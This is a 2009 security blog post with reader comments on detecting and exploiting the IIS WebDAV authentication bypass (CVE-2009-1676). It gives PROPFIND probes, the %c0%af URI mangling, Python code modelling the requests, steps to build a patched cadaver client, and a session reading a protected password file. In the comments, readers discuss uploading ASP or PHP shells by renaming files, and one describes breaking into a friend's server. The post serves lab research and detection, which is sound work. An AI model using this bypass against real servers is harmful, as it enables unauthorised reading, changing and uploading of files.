WebDAV Detection, Vulnerability Checking and Exploitation

Filed under: Hacking, Tools

Ahoy! My name is Andrew and I've been playing with the recent IIS WebDAV authentication bypass vulnerability (CVE-2009-1676), helping Ron write the nmap detection script (http-iis-webdav-vuln.nse) and testing it in the lab. Ron is in a meeting today, so I thought I'd jump in where he left off and post a bit about how to detect whether WebDAV is enabled and how to actually exploit a folder once you've determined it is vulnerable.

The first thing one should know when playing with this vulnerability is that the IIS server is not exploitable if the root folder is protected: every request, mangled or not, is challenged for credentials before WebDAV gets a say. For the same reason, if the root folder is protected there is no way to determine from the outside whether WebDAV is even enabled. That being said, if the root folder is _not_ protected then it's time to break out the funky cold medina and have some fun.

Detecting if WebDAV is enabled

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
* IIS 5.0/Windows 2000 SP4

On IIS 6.0, WebDAV is disabled by default (it is a Web Service Extension that has to be explicitly allowed). On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry (the DisableWebDAV value under the W3SVC parameters key) to disable it.

My method of detection simply involves sending a PROPFIND request for the server's root. This is the same basic PROPFIND request we use in the http-iis-webdav-vuln.nse script:

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop>
</propfind>

When WebDAV is enabled, it should return "HTTP/1.1 207 Multi-Status".

When WebDAV has been disabled, it should return a 501 status ("Not Implemented" is the reason phrase the RFC gives it; match on the status code, not the phrase).

This is the method I've implemented in the http-iis-webdav-vuln.nse script, and it works great in the lab on IIS servers. If we get back anything other than a 207 or 501 then we jump ship and report that the web server is not supported; an Ubuntu server running Apache, for instance, returns 405 Method Not Allowed. One thing to watch if you send this by hand: the Content-Length header must equal the number of bytes in the body you actually send, line endings included, or the request will hang or be misparsed.
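Here is the detection step as a small Python probe. This is an added example written for this page, not the post's code and not the logic of http-iis-webdav-vuln.nse itself; it reuses the XML body shown above, computes Content-Length from the bytes it sends rather than hard-coding it, adds a Connection: close header (an assumption, so the socket read terminates) and classifies the status line the same three ways the post describes.

```python
"""Added example (not the post's or Nmap's code): a minimal PROPFIND probe
that mirrors the detection logic described above."""
import socket

# The body from the post, with CRLF line endings; Content-Length is derived from it.
PROPFIND_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>\r\n'
    '<propfind xmlns="DAV:">\r\n'
    '<prop>\r\n'
    '<getcontentlength xmlns="DAV:"/>\r\n'
    '<getlastmodified xmlns="DAV:"/>\r\n'
    '<executable xmlns="http://apache.org/dav/props/"/>\r\n'
    '<resourcetype xmlns="DAV:"/>\r\n'
    '<checked-in xmlns="DAV:"/>\r\n'
    '<checked-out xmlns="DAV:"/>\r\n'
    '</prop>\r\n'
    '</propfind>\r\n'
).encode("utf-8")


def build_propfind(host, path="/"):
    """Return the raw PROPFIND request; Content-Length is computed, never hard-coded."""
    headers = [
        f"PROPFIND {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/xml",
        f"Content-Length: {len(PROPFIND_BODY)}",
        "Connection: close",   # assumption: not in the post's request, added so recv() ends
        "",
        "",
    ]
    return "\r\n".join(headers).encode("ascii") + PROPFIND_BODY


def classify(status_line):
    """Map the first response line to the outcomes the post distinguishes."""
    parts = status_line.split(b" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        return "unknown"        # not an HTTP status line at all
    code = int(parts[1])
    if code == 207:
        return "enabled"        # Multi-Status: WebDAV answered the PROPFIND
    if code == 501:
        return "disabled"       # IIS with WebDAV turned off
    return "unsupported"        # e.g. Apache's 405; the script bails out here


def probe(host, port=80, timeout=5.0):
    """Send the probe over a plain socket and classify the status line."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_propfind(host))
        data = b""
        while b"\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return classify(data.split(b"\r\n", 1)[0])


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it as `python3 probe.py <host>`; anything but "enabled" means there is nothing for the rest of this post to work on.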

Checking if a server is vulnerable

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2

Tested not working on
* IIS 5.0/Windows 2000 SP4

The original script only used one type of check; it would first find a protected folder (/secret/, i.e. one that answers a plain PROPFIND with a 401) and then try inserting the %c0%af sequence after the first /. It would turn /secret/ into /%c0%afsecret/. The sequence is an overlong UTF-8 encoding of "/": the authorization check no longer sees a path that matches the protected folder, and the WebDAV code strips the invalid bytes afterwards, so the request lands in /secret/ anyway.

This worked fine on IIS 6.0 but did not work at all on IIS 5.0/5.1. After playing with it some more today, we managed to get it working on IIS 5.1. The trick with 5.1 is that the %c0%af sequence can not be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0, so I modified the script to use the 5.1/6.0 check, turning /secret/ into /s%c0%afecret/. A folder is reported as vulnerable only when the plain path is protected (401) and the mangled path comes back 207.

Finding a vulnerable server

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2

Tested not working on
* IIS 5.0/Windows 2000 SP4

Now for the fun part. If you haven't turned on some funky cold medina yet, get to it because we're almost done!

First thing we need to do is find a vulnerable server. I just happen to know of a Windows 2003 box in my lab running IIS 6.0 that is vulnerable (fully patched up to today, by the way). Let's see how an nmap scan of this box with the updated script works out:

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds

Interesting! So now we know the server has WebDAV enabled and that there are three vulnerable folders.

Exploiting it!

Now we could do everything by telnet-ing over port 80, but that's not much fun (believe me, it's very tedious!) so I went looking for a WebDAV client. I stumbled upon a FOSS one called cadaver, and based purely on the name I grabbed it. Now cadaver itself is a great little command line WebDAV client, but I quickly realized it has a bunch of problems that won't let us do what we wanted. The nice thing about FOSS is that it's open, so we grabbed the cadaver-0.23.2 source and after hacking away at it for a while we came up with a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details, but basically it does the following:

1) Replace any "Depth: 0" header with "Depth: 1" (otherwise ls won't work: a Depth 0 PROPFIND describes only the collection itself, not its members)
2) Append the header "Translate: f" to every request (otherwise get, and probably others, won't work; Translate: f asks IIS for the file as stored rather than handing it to a script handler)
3) Insert the characters "%c0%af" into any URI request longer than 1 character.

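To make the two pieces above concrete, here is the folder check from the "Checking if a server is vulnerable" section and the three request rewrites from the patch list, modelled in Python. This is an added example for this page; it is neither the cadaver patch nor the NSE script, and the host name, folder names and status codes in SAMPLE_RESULTS are constructed for illustration.

```python
"""Added example; this is not the post's code nor the cadaver patch itself.
It models the three request rewrites the patch makes and the per-folder
decision the updated NSE script takes. Host, folders and status codes in
SAMPLE_RESULTS are constructed, not observed on any server."""
BYPASS = "%c0%af"   # overlong UTF-8 encoding of '/'; IIS discards it after the auth check


def insert_bypass(path, style="middle"):
    """Put %c0%af into the first path segment.

    style="start":  /secret/ -> /%c0%afsecret/   (the original check; IIS 6.0 only)
    style="middle": /secret/ -> /s%c0%afecret/   (the current check; IIS 5.1 and 6.0)
    "/" and "" are returned unchanged, matching the patch's "longer than 1 character" rule.
    """
    if path in ("", "/"):
        return path
    first, sep, rest = path.lstrip("/").partition("/")
    if style == "start":
        first = BYPASS + first
    else:
        first = first[0] + BYPASS + first[1:]
    return "/" + first + sep + rest


def patched_headers(headers):
    """The two header rules from the cadaver patch, applied to one request's headers."""
    out = dict(headers)
    if out.get("Depth") == "0":
        out["Depth"] = "1"        # Depth 0 lists only the collection itself, so ls shows nothing
    out["Translate"] = "f"        # ask IIS for the stored file instead of running a handler
    return out


def build_request(method, path, host, headers=None, body=b""):
    """Raw HTTP/1.1 request as the patched cadaver would emit it (rule 3: mangled URI)."""
    hdrs = patched_headers({"Host": host, **(headers or {})})
    if body:
        hdrs["Content-Length"] = str(len(body))
    lines = [f"{method} {insert_bypass(path)} HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in hdrs.items()]
    return "\r\n".join(lines + ["", ""]).encode("ascii") + body


def folder_is_vulnerable(plain_status, bypass_status):
    """Decision from the post: the folder must be protected on its own (401 to a
    plain PROPFIND) yet answer the %c0%af variant as if authorised (207)."""
    return plain_status == 401 and bypass_status == 207


# Constructed responses: folder -> (status for /folder/, status for /f%c0%afolder/)
SAMPLE_RESULTS = {
    "/private": (401, 207),
    "/secret": (401, 207),
    "/webdav": (401, 207),
    "/public": (207, 207),    # never protected, so nothing was bypassed
    "/admin": (401, 401),     # protected and not bypassable (e.g. a patched host)
}


def vulnerable_folders(results):
    """Folders a scan over `results` would report, sorted for stable output."""
    return sorted(folder for folder, (plain, bypass) in results.items()
                  if folder_is_vulnerable(plain, bypass))


if __name__ == "__main__":
    print(build_request("PROPFIND", "/secret/", "192.0.2.10", {"Depth": "0"}).decode())
    print("Vulnerable folders discovered:", ", ".join(vulnerable_folders(SAMPLE_RESULTS)))
```

Running the script prints the mangled PROPFIND with its Depth and Translate headers rewritten, followed by the same three folders the nmap output above lists. Note that the decision is a comparison of two responses per folder; a 207 on the mangled path alone proves nothing if the plain path was never protected.
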
So, grab the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here's the commands:

> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
--snip--
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
--snip--
> tar xzvf cadaver-0.23.2.tar.gz
--snip--
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
--snip--
> make
--snip--

Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:

> ./cadaver xxx.xxx.xxx.xxx

This should drop you to a "dav:/>" prompt. Now just cd into the vulnerable folder and check out what's there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':
ron$pr0ns
dav:/secret/>

And there you have it!

Here's a list of commands that I've tested that work with the patched cadaver on a vulnerable folder:
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE

Oddly enough, the COPY command does NOT work. We didn't have time to investigate why, but the functionality can be duplicated by a get/local rename/put.

Keep in mind what the bypass does and doesn't give you: it gets you past the folder's authentication requirement, but the virtual directory's own access permissions (read, write, script source access) still apply, so a put can still come back 403 on a read-only directory.

Also, this patched cadaver will not work for browsing regular WebDAV folders (non-vulnerable), since it mangles every URI it sends, so don't try.

If anyone has been able to successfully exploit this on IIS 5.0 (Windows 2000), please contact me, we've been trying and can't get it to work in the lab here.

Comments are welcome, you can also contact me by e-mail: andrew at andreworr dot ca

Andrew, May 20, 2009 (45 comments)

45 Responses to “WebDAV Detection, Vulnerability Checking and Exploitation”

  1. Goku Says:

    Isn't it also possible to check if a server has webdav enabled by sending this?

    OPTIONS * HTTP/1.0

  2. Ron Says:

    Hi Goku,

    OPTIONS can detect if it's enabled, but OPTIONS can be disabled (and it's best practise to do so -- I expect that most corporate environments disable it). Our method doesn't rely on OPTIONS, but seems to be totally reliable.

    We're planning on using OPTIONS as a backup plan if the '/' folder is password protected, though. At least then we'll have something.

  3. Lotches Says:

    I can't scan with nmap. I'm using BackTrack; BackTrack doesn't have nsedebug. How do I install it?

  4. Andrew Says:

    Goku: That method does not seem to work reliably. It seems there is a way to disable support for a HTTP OPTIONS request on IIS 6.0. See http://seclists.org/nmap-dev/2009/q2/0417.html for more info. That being said, it would be a great idea to add it as a fallback for when the PROPFIND method doesn't work.

  5. Matt Says:

    Lotches,

    check out the last post regarding nmap for detailed instructions. You can perform an svn update with BT3/4. You can also just reinstall over top, but that's not as helpful and can cause a few problems.

    quick solution:
    $ mkdir nmapbeta/
    $ svn co --username guest --password \\ svn://svn.insecure.org/nmap/ nmapbeta/

    $cd nmapbeta; ./configure; make
    $ ./nmap --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

    enjoy.

  6. Lotches Says:

    Hello Matt, my Y!M (Yahoo Messenger) is: lotches
    MSN: lotches@live.com
    Can you talk about this bug?

  7. Lotches Says:

    Sometimes I get this error: |_ http-iis-webdav-vuln: ERROR: Couldn't find folders.lst (should be in nselib/data)

  8. orangepeacock Says:

    I tried it on IIS 6.0 on our lab.
    It was configured like that:
    we created a vhost based on a folder browsable by everyone, which contains some txt files accessible only by administrator.

    I can browse the folder and its content with a common browser, but when I try to list its content using your patched cadaver, it returns no files, like the folder is empty.

    Moreover trying to bypass auth mechanism using unicode attack doesn't work either :(

    I followed exactly your tutorial I suppose. Any clues?

    Regards.

  9. Matt Says:

    Lotches,

    just hit the last post before this. That should give you the detailed information to solve these issues.

  10. orangepeacock Says:

    @lotches

    it is because you dont have folders.lst in the location you mentioned (nselib/data).

    I guess you have to create a new one containing the names of folders you want to bruteforce

  11. Andrew Says:

    @orangepeacock

    I'm getting the same results in our lab. I can also browse the contents with a common browser and see there is a file there, but using cadaver (patched and not patched) it does not show the file. Getting the file works (with the patched cadaver), but I'll take a look in a little bit and see what the browser is doing differently than cadaver and try to replicate that in the cadaver patch.

    Thanks for the info!

  12. Lotches Says:

    @orangepeacock: Can you share a server with me? I have been searching for one but I can't find it :((

  13. Lotches Says:

    @Matt: I saw, but I want to talk with you. Nice to chat with you

  14. Ron Says:

    Hi Lotches,

    The instructions are all available in this thread, especially in Matt's post -- I don't think we can do much more to help you.

    Ron

  15. orangepeacock Says:

    @Lotches
    sorry, we are using vmware in LAN.

    @Andrew

    besides cadaver issue, I cannot get the attack working, regardless the position of the unicode inside the string!
    Looks like one does not simply unicode his way into mordor!

  16. Goku Says:

    I've successfully been able to upload a PHP file to a WebDAV server with authentication.
    When I then try to do a GET request to execute the PHP shell I get the source code instead.

    So actually it ain't possible to execute system commands.

    Correct me if I'm wrong.

    Goku

  17. chia Says:

    I can upload a file to the server but I can not upload an asp or aspx file, maybe your server???

  18. Goku Says:

    You have to upload it as a txt file. Then afterwards rename it to .asp

  19. chia Says:

    @Goku
    No, I can't, I think the server doesn't accept upload or rename to an asp file

    [quote]
    dav:/> move 1.txt 1.asp
    Moving `/1.txt' to `/1.asp': failed:
    http://xxxxx.net/1.asp: 403 Forbidden

    [/quote]

  20. Goku Says:

    Some do some don't.

  21. wishnu Says:

    I got this error, can someone give me the answer :(

    wishnu@stupid:~/nmapbeta$ ./nmap --script=http-iis-webdav-vuln 202.158.15.86
    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-25 00:24 WIT
    NSE: failed to initialize the script engine:
    ./nse_main.lua:199: ./http-iis-webdav-vuln.nse:1: '=' expected near '/'
    stack traceback:
    [C]: in function 'assert'
    ./nse_main.lua:199: in function 'new'
    ./nse_main.lua:348: in function 'Entry'
    ./scripts/script.db:16: in function 'db_closure'
    ./nse_main.lua:361: in function 'get_chosen_scripts'
    ./nse_main.lua:504: in main chunk
    [C]: ?

    QUITTING!

  22. Ron Says:

    Hi wishnu,

    I don't know exactly what your problem is, but try running this command first:
    export NMAPDIR=.

    That'll tell Nmap to use the current directory for its datafiles, not the system directory. It's important to run that before you run Nmap from a non-system folder.

    Hope that helps! If not, I suggest posting to the nmap-dev mailing list.
    Ron

  23. zo0t Says:

    What about over SSL? How can I enable SSL?

  24. MI1 Says:

    Thanks man, works great. Just today I was at the Faculty of Informatics and Electrotechnics at my university, met an old friend there with a Microsoft Server in his office and he challenged me to break into it. In less than 10 seconds the work was done and I won a beer :) Cheers

  25. Ron Says:

    Hi zoot,

    Unfortunately, I don't think the tool we modified supports SSL at all...

    Ron

  26. Ron Says:

    @MI1: I think that means you owe us half a beer! ;)

  27. anderson Says:

    Hi
    ==================
    anderson@ubuntu:~/cadever-h4x/cadaver-0.23.2$ ./cadaver 123.30.51.25
    dav:/> cd secret
    Could not access /secret/ (not WebDAV-enabled?):
    Did not find a collection resource.
    dav:/> ls -al
    Listing collection `/-al/': collection is empty.
    dav:/>
    ==============================
    Finished successfully?
    I can't command the server.
    Why?

  28. anderson Says:

    Resource not found
    Please help me
    =============
    > patch -p1 < ../cadaver-0.23.2-h4x.patch
    patching file lib/neon/ne_basic.c
    patching file lib/neon/ne_request.c
    patching file lib/neon/ne_uri.c

    ===================

  29. Ron Says:

    @anderson: it looks like you're doing it right, but either WebDAV isn't enabled or the folder denies permission to list contents, even with WebDAV.

    The only thing I notice is, don't do "ls -al", Cadaver doesn't understand that, just do "ls".

  30. zo0t Says:

    y0
    I found cadaver-ssl-0.22.2-1012.
    I'm wondering if it's possible to patch this one? I'm working on it, trying to patch it, but I'm not sure about the version...

  31. Ron Says:

    @zo0t: It *might* work, I don't really see why it wouldn't.. let me know how it goes :)

  32. wishnu Says:

    I succeeded in installing it, thanks for your help my friends... Oh, I forgot, my name is wishnu from Indonesia :D..... nice to meet you all

  33. acemutha Says:

    I can't get the put method to work..

    dav:/webdav/> get readme.txt
    Downloading `/webdav/readme.txt' to readme.txt:
    Progress: [=============================>] 100.0% of 27 bytes succeeded.

    dav:/webdav/> put readme.txt
    Uploading readme.txt to `/webdav/readme.txt':
    Progress: [=============================>] 100.0% of 27 bytes failed:
    403 Forbidden

    dav:/webdav/> cat readme.txt
    Displaying `/webdav/readme.txt':
    U r not supposed to read me

    Is there a special configuration in the virtual directory to have?

    Thanks in advance.

  34. acemutha Says:

    Further investigations allowed me to write to the webdav folder only if write permission was enabled.
    Is that correct, or does the put method work with read-only permission too?

  35. reaper Says:

    On two or three test cases (all sites I tried) the vulnerability did not work. The scanner found the folders as vulnerable.

    cadaver and issuing the request manually gave either a 404 or an IIS permissions error. The anonymous user for the site had rights to the private folders. This was IIS 6.0 and 5.0 with WebDAV enabled.

    Sounds like this vulnerability works on even fewer configurations or something.

  36. river Says:

    This vulnerability is valid for SMTP IIS

  37. Cortex Says:

    Hello!

    I've just written a translation about this excellent article. I hope there's no problem (I posted a link to the article). Here's the translation:

    http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml

    See you!

  38. Ron Says:

    @Cortex: Very cool!

    Although I didn't technically write the blog (Andrew did), I don't have any issue with a translation. :)

  39. Andrew Says:

    @cortex: Awesome, the only Spanish I know is 'cerveza por favor', nice work!

  40. John Says:

    Hey, I need help with nmap. When I want to scan for vulnerable WebDAV:

    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-08 09:55 Central Europe Daylight Time
    NSE: failed to initialize the script engine:
    C:\WINDOWS\system32\nse_main.lua:370: 'http-iis-webdav-vuln' did not match a category, filename, or directory
    stack traceback:
    [C]: in function 'error'
    C:\WINDOWS\system32\nse_main.lua:370: in function 'get_chosen_scripts'
    C:\WINDOWS\system32\nse_main.lua:503: in main chunk
    [C]: ?

    QUITTING!

    Please help

  41. Lee Says:

    I have the same trouble! ↑
    Sorry, my bad English!

  42. Noxen Says:

    Hey, when I try to "make" the cadaver application I get an error, well, a list of errors rather talking about how libintl.h is missing and it can't use the "gettext" command or something.

    Any help?

  43. Damien Says:

    Hello,

    I'm having trouble using cadaver; is it easy to use Metasploit to do the exploit? Can you share some methods of doing it?

  44. Kevin Says:

    dav:/> cat default.asp
    Displaying `/default.asp':
    Failed: 403 Forbidden
    dav:/>

    How do I display it? I got the same problem with another file on another IIS. Thanks

  45. Kevin Says:

    Hi! I couldn't get or cat any ASP file, but I can view CSS files. How do I get or cat an ASP file? Thanks
